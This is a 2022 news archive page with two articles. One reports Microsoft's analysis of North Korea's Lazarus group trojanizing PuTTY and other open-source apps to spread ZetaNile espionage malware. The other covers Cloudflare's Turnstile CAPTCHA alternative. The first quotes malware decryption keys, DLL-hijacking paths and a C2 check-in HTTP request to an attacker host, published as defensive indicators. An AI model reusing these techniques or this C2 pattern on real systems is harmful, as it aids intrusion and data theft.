Month: September 2022

Hackers backed by the North Korean government are weaponizing well-known pieces of open source software in an ongoing campaign that has already succeeded in compromising “numerous” organizations in the media, defense and aerospace, and IT services industries, Microsoft said on Thursday.

ZINC—Microsoft’s name for a threat actor group also called Lazarus, which is best known for conducting the devastating 2014 compromise of Sony Pictures Entertainment—has been lacing PuTTY and other legitimate open source applications with highly encrypted code that ultimately installs espionage malware.

The hackers then pose as job recruiters and connect with individuals of targeted organizations over LinkedIn. After developing a level of trust over a series of conversations and eventually moving them to the WhatsApp messenger, the hackers instruct the individuals to install the apps, which infect the employees’ work environments.

“The actors have successfully compromised numerous organizations since June 2022,” members of the Microsoft Security Threat Intelligence and LinkedIn Threat Prevention and Defense teams wrote in a post. “Due to the wide use of the platforms and software that ZINC utilizes in this campaign, ZINC could pose a significant threat to individuals and organizations across multiple sectors and regions.”

PuTTY is a popular terminal emulator, serial console, and network file transfer application that supports network protocols, including SSH, SCP, Telnet, rlogin, and raw socket connection. Two weeks ago, security firm Mandiant warned that hackers with ties to North Korea had Trojanized it in a campaign that successfully compromised a customer’s network. Thursday’s post said the same hackers have also weaponized KiTTY, TightVNC, Sumatra PDF Reader, and muPDF/Subliminal Recording software with code that installs the same espionage malware, which Microsoft has named ZetaNile.

Lazarus was once a ragtag band of hackers with only marginal resources and skills. Over the past decade, its prowess has grown considerably. Its attacks on cryptocurrency exchanges over the past five years have generated billions of dollars for the country’s weapons of mass destruction programs. They regularly find and exploit zero-day vulnerabilities in heavily fortified apps and use many of the same malware techniques used by other state-sponsored groups.

The group relies primarily on spear phishing as the initial vector into its victims, but they also use other forms of social engineering and website compromises at times. A common theme is for members to target the employees of organizations they want to compromise, often by tricking or coercing them into installing Trojanized software.

The Trojanized PuTTY and KiTTY apps Microsoft observed use a clever mechanism to ensure that only intended targets get infected and that it doesn’t inadvertently infect others. The app installers don’t execute any malicious code. Instead, the ZetaNile malware gets installed only when the apps connect to a specific IP address and use login credentials the fake recruiters give to targets.

The Trojanized PuTTY executable uses a technique called DLL search order hijacking, which loads and decrypts a second-stage payload when presented with the key “0CE1241A44557AA438F27BC6D4ACA246” for use as command and control. Once successfully connected to the C2 server, the attackers can install additional malware on the compromised device. The KiTTY app works similarly.

Similarly, the malicious TightVNC Viewer installs its final payload only when a user selects ec2-aet-tech.w-ada[.]amazonaws from the drop-down menu of pre-populated remote hosts in the TightVNC Viewer.

Thursday’s post continued:

The trojanized version of Sumatra PDF Reader named SecurePDF.exe has been utilized by ZINC since at least 2019 and remains a unique ZINC tradecraft. SecurePDF.exe is a modularized loader that can install the ZetaNile implant by loading a weaponized job application themed file with a .PDF extension. The fake PDF contains a header “SPV005”, a decryption key, encrypted second stage implant payload, and encrypted decoy PDF, which is rendered in the Sumatra PDF Reader when the file is opened.

Once loaded in memory, the second stage malware is configured to send the victim’s system hostname and device information using custom encoding algorithms to a C2 communication server as part of the C2 check-in process. The attackers can install additional malware onto the compromised devices using the C2 communication as needed.

The post went on:

Within the trojanized version of muPDF/Subliminal Recording installer, setup.exe is configured to check if the file path ISSetupPrerequisitesSetup64.exe exists and write C:colrctlcolorui.dll on disk after extracting the embedded executable inside setup.exe. It then copies C:WindowsSystem32ColorCpl.exe to C:ColorCtrlColorCpl.exe. For the second stage malware, the malicious installer creates a new process C:colorctrlcolorcpl.exe C3A9B30B6A313F289297C9A36730DB6D, and the argument C3A9B30B6A313F289297C9A36730DB6D gets passed on to colorui.dll as a decryption key. The DLL colorui.dll, which Microsoft is tracking as the EventHorizon malware family, is injected into C:WindowsSystemcredwiz.exe or iexpress.exe to send C2 HTTP requests as part of the victim check-in process and to get an additional payload.

POST /support/support.asp HTTP/1.1
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64;
Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729;
InfoPath.3; .NET4.0C; .NET4.0E)
Content-Length: 125
Host: www.elite4print[.]com

bbs=[encrypted payload]= &article=[encrypted payload]

The post provides technical indicators that organizations can search for to determine if any endpoints inside their networks are infected. It also includes IP addresses used in the campaign that admins can add to their network block lists.

Cloudflare has recently made an audacious claim: We could all be doing something better with our lives than deciding which images contain crosswalks or stop lights or clicking an “I’m not a robot” checkbox. Now the cloud services company is offering up a free CAPTCHA alternative, Turnstile, available to anyone, Cloudflare customer or not, and specifically calling out Google’s role in the existing “prove you’re a human” hegemony.

Turnstile utilizes Cloudflare’s Managed Challenge system, which takes cues from user behavior, browser data, and, on Apple devices, Private Access Tokens, to distinguish human visitors from bots and scripts. Cloudflare claims that its Managed Challenge system was able to reduce 91 percent of CAPTCHAs served to its customers’ visitors over a year.

Turnstile integrations run “a series of small non-interactive JavaScript challenges” to investigate the visitor, including proof of work and space, probing for web APIs, and “various other challenges for detecting browser-quirks and human behavior,” Cloudflare’s post states. The challenges vary by visitor, and machine learning can update the model with the common features of visitors who previously passed a test. The user only sees a “Verifying …” widget for a moment, then “Success!”

Cloudflare claims that beyond annoyance and time-wasting, CAPTCHAs (which stands for “Completely Automated Public Turing test to tell Computers and Humans Apart”) are largely controlled by Google through its reCAPTCHA service. Google’s service had announced in 2017 that it would largely become invisible in newer versions, using the same browser and behavior hints about human-ness Cloudflare is touting to eliminate even the not-robot checkbox. One aspect of that proof that security researchers seemed to suss out: being logged in to a Google account.

“Google says they don’t use this information for ad targeting, but at the end of the day, Google is an ad sales company,” Cloudflare’s post states.

Google bought reCAPTCHA in 2009 and used it early on to solve problems like book digitization, Street View house numbers, and, as you’ve likely guessed, identifying objects like stairs, palm trees, taxis, and the like in image recognition tools. Cloudflare notes that CAPTCHA’s ubiquity is one of its strengths, as it has a steady, constantly updated base of solving and behavior data to lean on.

Google’s reCAPTCHA has offered an “invisible” mode in V2 since 2017 and a V3 that “will never interrupt your users.” Most Internet users still see their fair share of photo-picking grids and anti-robot checkboxes, likely due to sites and developers who haven’t upgraded to newer versions—or, potentially, seeming “suspicious” of an unknowable algorithm.

Cloudflare, originally a content-delivery network that has grown into security, hosting, and nearly every other aspect of cloud computing, cites its mission of “helping build a better Internet” as the reason it’s giving away a free verification service. The company, whose reverse proxy services are used by something close to 20 percent of all sites, has been in the news recently for its long debate on dropping hate site Kiwi Farms and deciding not to pull out of Russia after it invaded Ukraine.